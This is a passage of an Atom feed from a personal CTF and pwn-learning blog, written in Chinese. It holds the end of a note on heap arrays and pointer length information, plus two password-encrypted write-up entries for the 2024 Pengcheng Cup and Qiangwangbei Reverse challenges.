类型数组的指针，指针变量中存储的是堆上分配的数组首地址，而数组的长度信息（200）并没有保存在指针本身中。</li><li><code>p2</code> 的类型是 <code>char*</code>，同样也只记录了指向 <code>char</code> 类型数组的首地址，而 <code>new char[30]</code> 分配的 30 字节大小信息也没有包含在 <code>p2</code> 中。</li></ul><p>这种情况下，如果需要得知堆上分配的数组大小，就必须额外记录或传递数组的长度（如使用变量保存长度，或封装到 <code>std::vector</code> 等容器中）。</p><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><ul><li><strong>堆分配</strong>：<code>new</code> 操作符动态分配的内存默认分配在堆上。</li><li><strong>大小不可知</strong>：指针 <code>p1</code> 和 <code>p2</code> 本身不包含长度信息，因此无法直接从指针推断出堆中分配的内存块大小。</li></ul></blockquote><h1 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h1><h3 id="放一个TK师傅在腾讯玄武实验室内部例会上的分享"><a href="#放一个TK师傅在腾讯玄武实验室内部例会上的分享" class="headerlink" title="放一个TK师傅在腾讯玄武实验室内部例会上的分享"></a>放一个TK师傅在腾讯玄武实验室内部例会上的分享</h3><h4 id="关于个人成长："><a href="#关于个人成长：" class="headerlink" title="关于个人成长："></a>关于个人成长：</h4>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;Pwn入门阶段小结&quot;&gt;&lt;a href=&quot;#Pwn入门阶段小结&quot; class=&quot;headerlink&quot; title=&quot;Pwn入门阶段小结&quot;&gt;&lt;/a&gt;Pwn入门阶段小结&lt;/h1&gt;&lt;p&gt;一编：&lt;/p&gt;
&lt;p&gt;意外看到这本书决定开始学到开始学，不到半小时；认认真真看到堆之</summary>
      
    
    
    
    
    <category term="笔记 Pwn" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/%E7%AC%94%E8%AE%B0-Pwn/"/>
    
  </entry>
  
  <entry>
    <title>鹏程杯2024 |Reverse</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/10/pcbctf2024/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/10/pcbctf2024/</id>
    <published>2024-11-09T16:00:00.000Z</published>
    <updated>2024-12-16T03:45:39.171Z</updated>
    
    <content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">  <script id="hbeData" type="hbeData" data-hmacdigest="af702b512fe22963f73e6d35f36c12c0308eb908bb5ad89fe2ffa488e9d54610">35a55f2c26f92125317739f3d5181cb91e8ca40d7d5bccd59eaae73e172f01822f0f257f2ae507fc108e5de2438e451ac3071c644126effb2cbe90ec887b2aba2d913ed3e2d39b55ba6e1e74d1eb4d47bbfa31a784b6b14c9919a15603dc27d8e1d8e9bb21b7461ca21bc32a6fc2fff72ba4ffa70b12c824509ec5b19115e1537e87524cabeca8692f43b91118e006006f0315d730f11d4a36e0d72c7410037f03f35f553f9429ff3ff651e7f126b23f96a463ab78c1255fecd00cf4041b6a4e5d0c43428dd54b653f7451b96d869d83c2c1524d6fcf7c36750b16ac000387d851b9c455abb6f730920d4ff54bf513df090e19de1c830b27914c66b79e9644665916a924dc75c4e70bb4f5f8d7e282415e41b31db202183c2b8d28d0bc23574a6230f5da8077aa837b0c65b6742f9e01137bc0def3c9647ba2d548f8820598d3a54ee9c899ae6bdebe0e239f30fd6828f90eb673cd9aa7df2cc7790802f9f4491cd827ed9ca4998ce250b70c150a5a8773417a2a4d5078b7069349809377c5363e2aef9a114988053e5aa0cf45b669f92ff7fc8950c4ef31532c85937ccca62dec67caf09b1cd0ea9e33bda32197671b248e5567dc5a1ff8bd9b56c9800ca87c79c26139e383f85db3b28f6ca917e365e153aa64885b3d2a343e88f96eb00887d593614f9ab7e9414d8e7d9845c67513818ad434ce5776e2c6ba3434ed2b0f5bc164ccbd32111f76eca91957cc0cab154c6643a78dad147bcba251ba0cb92f48af3ad7a0f75e3f1b88428ab4aeee5e0fc10d9fdab6f105ad06ae733a6fac1c2c7a6672e9b0b58848e1552c761005c7feb83e2c4c49b1a0608077f48dc3c63730e8b8394a07a468290dd175160fe0585211805cb419617833c54ca8b0dd85df69c73db83cfa3ea29a2893b10563282d5340ca53a10e3d80d03057d0d00a9bc23a32db1fd0c215cf331a31dc2e61dac8daeb75349be032d096dd7022f7b12bb15a332bba1218652ce2cb54fde4fbda00423907c5ba30ab90a6b4ff5207b6e83c9e19d5d19d4c698c1e3dd00e9d1c2eb393591187b1694b41e944c07143e0d39198</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">You must enter the password to read.</span>      </label>    </div>  </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
    
    
    <summary type="html">This blog is encrypted.</summary>
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
  <entry>
    <title>强网杯 2024  |Reverse</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/10/qiang-wang-bei-2024/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/10/qiang-wang-bei-2024/</id>
    <published>2024-11-09T16:00:00.000Z</published>
    <updated>2024-12-16T03:45:32.261Z</updated>
    
    <content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">  <script id="hbeData" type="hbeData" data-hmacdigest="9862abab6f766ea03c189a74efb744d2a1c1ebd1122d93892fe948a995b04610">35a55f2c26f92125317739f3d5181cb947454fb3786c5f34be6db0e796151b089197dc4fa0233563a264b8122d69133b006359104e44bf73d99186e737dc6c360c4c7cf28cab9a411effa303c941d298d83e537e0a46939d497cf7ec34afb29f0f5eb07738668fceece06752f028fc0cdce96f67f795258156182e6b28055c21e2a277b17c2e0966e87b56c25f22a7dc4df69715a846c7143ec1de13c4aba4dfd41bf348d8ba43fd68846247a9a93ad91f47adb0a3ffbb73a3d1add38bf9300e2a3a1199c4ff69107ad974d77745bac59b4a270c686f3586fe16167508254d4e18623181cae80390e4d949fb859356d4a30ab6c33c936f178df6548c17a71bccfbf30b8e4875f243a18cccdde69f587093358817310bb8258387a2239660c2a2650d805b3490a49760a6aa303e403951</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">You must enter the password to read.</span>      </label>    </div>  </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
    
    
    <summary type="html">This blog is encrypted.</summary>
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
</feed>